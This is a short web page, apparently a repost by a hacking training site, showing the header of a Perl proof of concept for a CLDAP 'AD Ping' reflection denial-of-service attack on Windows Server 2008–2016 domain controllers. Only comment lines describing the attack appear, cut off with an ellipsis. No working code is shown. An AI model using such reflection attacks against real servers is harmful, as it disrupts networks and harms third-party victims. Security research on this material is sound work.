Microsoft Windows Server 2008 / 2012 – LDAP RootDSE Netlogon Denial Of Service (PoC)
Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credit: Todor Donev
#!/usr/bin/perl
#
# MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
# (CLDAP “AD Ping”) query reflection DoS PoC
#
#
# MS Windows Server 2016
#
# Description:
# The attacker sends a simple query to a vulnerable reflector
# supporting the Connectionless LDAP […]